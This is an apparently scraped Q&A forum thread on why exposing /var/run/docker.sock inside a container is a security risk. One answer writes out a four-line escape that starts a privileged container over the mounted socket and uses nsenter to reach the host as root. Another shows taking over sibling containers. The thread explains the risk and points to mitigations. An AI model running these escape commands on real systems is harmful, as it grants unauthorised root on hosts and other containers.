What is the Docker security risk of /var/run/docker.sock?

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温柔的废话
温柔的废话 2020-12-31 19:01

In this blog article, I found the quote below in a comment:

Ben Firshman

Yes – you\'re right I should have pointed out the security issue

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  • 2020-12-31 19:09

    This is an old question, but I hope I can actually give you a precise example.

    could someone explain in clear terminology exactly what this "security issue" is?

    Here is the core of the exploit:

    sh0% docker run -v /var/run/docker.sock:/ourdocker.sock:ro -it ubuntu bash
    sh1# docker -H unix:///ourdocker.sock run --privileged -v /:/host ubuntu bash
    sh2# nsenter --mount=/host/proc/1/ns/mnt --pid=/host/proc/1/ns/pid
    sh3# # now we are in the host namespaces with root access
    

    If you use user namespaces this problem is harder to exploit but is still somewhat possible in certain scenarios (and you can still impact other containers running on the same host).

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  • 2020-12-31 19:12

    The accepted answer supplied a great explanation, so I won't repeat any of the details regarding the fact that you're mounting a file owned by root.

    Maybe the following example is trivial to some readers, but I'm surprised nobody mentioned it.

    Remember the fact that you have access to a very special file on the host - docker.sock.

    So if you install Docker inside your container:

    apt-get update  
    apt-get install docker.io -y
    

    Or as a one-liner with the container creation:

    docker run -it -v /var/run/docker.sock:/var/run/docker.sock ubuntu:latest sh -c  "apt-get update ; apt-get install docker.io -y ; bash"
    

    (Inside the container check with docker ps that you see the other containers running on the host).

    Now you have full control over the other containers in your host.

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  • 2020-12-31 19:28

    Any process that can write to the dockerd socket also effectively has root access on the host... Well, can you use that or not in production is up to you.

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  • 2020-12-31 19:29

    for the rest of us, could someone explain in clear terminology exactly what this "security issue" is?

    The owner of the docker /var/run/docker.sock is root of the host where the container is running, with default group membership to docker group. That's why mounting var/run/docker.sock inside another container gives you root privileges since now you can do anything that a root user with group membership of docker can.

    Does this effectively prohibit this approach from Production usage? If so, is there a workaround?

    For a workaround may be these posts will help: https://integratedcode.us/2016/04/08/user-namespaces-sharing-the-docker-unix-socket/ and https://integratedcode.us/2016/04/20/sharing-the-docker-unix-socket-with-unprivileged-containers-redux/

    Taking a step back, it would be useful to understand the usecase where you need to mount var/run/docker.sock and see if there are alternative ways to satisfying the usecase. Unfortunately, without a usecase description in the question, it is difficult to provide an alternative which avoids mounting the unix socket.

    Good luck and kudos for trying to do the right thing!

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